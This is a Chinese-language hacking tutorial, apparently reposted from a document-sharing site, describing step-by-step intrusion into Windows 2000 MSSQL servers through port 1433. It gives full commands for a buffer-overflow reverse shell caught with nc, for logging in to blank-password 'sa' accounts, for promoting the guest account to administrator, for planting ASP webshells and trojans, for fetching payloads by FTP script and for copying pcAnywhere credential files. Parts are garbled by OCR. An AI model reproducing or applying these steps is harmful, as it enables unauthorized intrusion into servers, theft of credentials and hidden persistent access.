《1433端口的溢出攻击.docx》由会员分享,可在线阅读,更多相关《1433端口的溢出攻击.docx(6页珍藏版)》请在三一办公上搜索。
1、在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样, 你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始一运行一写Acmd 回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的 话,就在你开的这个窗口下打入命令c:nc -l -p 40回车。这步的意思是用nc这个工具开一个40 的端口监听。第二步:再在开始一运
2、行一写入cmd回车,再开一个窗口。在这个窗口写命令行c:sql2.exe你 要入侵网站的ip自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:ping 就可以看到了。自己的ip呢?在cmd下c:ipconfig就可以看到了。其中命令行中 的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1 或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的:winntsystem32.就 是说,你已经进入它的机器里了。进去以后,你可以填加个用户了 net user guest /active:yes 用这个命令,就将默认禁止的g
3、uest用户激活。net user guest 123456这样guest的密码变成123456 了。net localgroup administrators guest /adc这就是guest 成为最高权限的管理员了。本贴包含图片附件:色 CWINNT5y5tem32cmd.eMer|n| x|iiCFirsof t Ulndous 306 Uersiun S -00:.2195 版权所有 1985-2S6S Microsoft Cappsql2 111.111,111,111 222.222.222,222 56 3第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,
4、用户名是a,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在也有下。看看入侵方法, 我以前在小榕论坛贴的:lcx的win98下sa空密码入侵脚本20步1. 如何找到sa空密码肉鸡?自己用流光扫吧。2. 注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。3. 工具:supersqlexec.exe、cmd.asp(有下)海阳顶端网木马(黑白)放在本 机f:盘4. 用supersqlexec联接成功。在命令行中输入net user guest /active:yes(指肉鸡回显下同)The command completed successfu
5、lly.本贴包含图片附件:net user guest 123456 The command completed successfullynet localgroup administrators guest /add The command completed successfully.这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令, 复习一下。5. 心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。 (其实有时流光种植者不成功,但用手工方法就可以6. 换个用户名吧。回到supersqlexe.exe的命令
6、模式net user lcx 123456 /add命令失败。服务器没开ipc$?7. 回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流 光联不上,我百思不得其解。我后来换wn2000的cmd下net use ipipc$ 123456 /user:guest 也不能联接成功。8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip9. 回到sqlexe命令行中net use x: 本机ipf,将自己本机f:盘映射成为肉鸡的x盘。过了一会,服务器显示命令成功完成10. sqlexe命令行中运行set得
7、知其主页位置在d:inetpubwwwrooto不错,服务器支持asp.你如 果看不懂这个命令,也可以根据其主页上某个图像文件名,然后lir *.jpg/s查找其主页位置。11. sqlexe命令行中copy x:cmd.asp d:inetpubwwwroot这个目录是肉鸡网站的目录。12. 回到ie中http:/服务器ip/cmd.asp,出现了 ie界面的dos.建个文件夹看看。md d:inetpubwwwrootaspmm13.sqlexec命令行中copy x:海阳顶端网木马*.* d:inetpubwwwrootaspmmM将目录隐藏attrib +h d:inetpubwwwr
8、ootaspmm14. 现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来copyJ !这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一Tftp上传。先将自己的文件*.exe上传到个人主页空间。15. 在自己本机上建立up.txt内容如下:open 说明:这里是指我用得是网易ftp)username(说明:你的上传用户名)password(说明:密码)get lcx.exe说明:你要上传到肉鸡的文件名)bye(说明:退出ftp)通过映射copy到肉鸡的c:up.txt16.sqlexec命令行中ftp -s:c:up.txt(注: ftp的用
9、法你在win2000里的帮助里可以很详细查到I)等一 会你 就看到lcx.exe已经在肉鸡在winntsystem32下了。17运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可 惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。 如何运行你上传的木马,就看第二节18.通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在 C:/WINNT/Profiles/AllUsers/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy 它呢?19通过一天
10、的dos8.3规则的补习才知应是这样:copy c:winntProfilesalluse1applic2symantecpcanyw1*.cifd:inetpubwwwrootM后通过 ie 下载。其实,也可以用asp写一个小程序copy.20流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest 用户却可以激活不知什么原因。其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个 up.txt.echo你要写的up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉 贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行。
